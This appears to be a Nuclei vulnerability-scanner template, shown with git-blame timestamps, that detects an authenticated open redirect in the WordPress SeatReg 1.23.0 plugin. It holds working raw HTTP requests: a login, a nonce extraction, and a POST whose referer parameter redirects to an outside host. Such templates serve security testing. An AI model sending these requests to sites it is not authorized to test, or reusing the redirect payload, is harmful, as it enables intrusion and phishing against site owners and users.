nuclei-templates/vulnerabilities/wordpress/seatreg-redirect.yaml

51 lines
1.4 KiB
YAML
Raw Normal View History

2023-02-20 10:17:19 +00:00
id: seatreg-redirect
2023-02-16 19:06:05 +00:00
info:
2023-02-20 17:20:25 +00:00
name: WordPress Plugin SeatReg - Open Redirect
2023-02-16 19:06:05 +00:00
author: Mariam Tariq
2023-02-20 10:17:19 +00:00
severity: medium
description: |
WordPress SeatReg plugin version 1.23.0 suffers from an open redirection vulnerability.
reference:
- https://packetstormsecurity.com/files/167888/WordPress-SeatReg-1.23.0-Open-Redirect.html
metadata:
verified: "true"
tags: redirect,packetstorm,seatreg,wp-plugin,wp,wordpress,authenticated
2023-02-16 19:06:05 +00:00
requests:
2023-02-20 10:17:19 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2023-02-16 19:06:05 +00:00
2023-02-20 10:17:19 +00:00
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=seatreg-welcome HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new-registration-name=test&action=seatreg_create_submit&seatreg-admin-nonce={{seatreg-admin-nonce}}&_wp_http_referer=http://interact.sh&submit=Create+new+registration
cookie-reuse: true
2023-02-16 19:06:05 +00:00
matchers:
2023-02-20 10:17:19 +00:00
- type: dsl
dsl:
2023-02-20 17:20:25 +00:00
- status_code_3 == 302
2023-02-20 10:17:19 +00:00
- contains(header_3, 'http://interact.sh')
condition: and
2023-02-19 18:24:54 +00:00
2023-02-20 10:17:19 +00:00
extractors:
- type: regex
name: seatreg-admin-nonce
part: body
group: 1
regex:
- '"seatreg\-admin\-nonce" value="([0-9a-z]+)"'
internal: true